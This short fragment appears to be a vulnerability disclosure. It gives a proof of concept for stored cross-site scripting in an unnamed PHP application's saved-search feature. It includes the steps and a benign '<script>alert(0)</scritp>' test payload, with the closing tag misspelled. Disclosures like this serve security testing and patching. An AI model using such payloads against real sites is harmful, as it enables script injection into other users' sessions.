// and no output validation, $display passed immediately
return $display;
======================================================================================================
POC :
=====
load http://address/index.php?action=save_search < note some parameter set by passed url >
in textbox enter <script>alert(0)</scritp>.
load http://address/index.php?action=view_saved_searches to view result
______________________________________________________________________________________________________
~Blackout Frenzy [http://b0f.ir]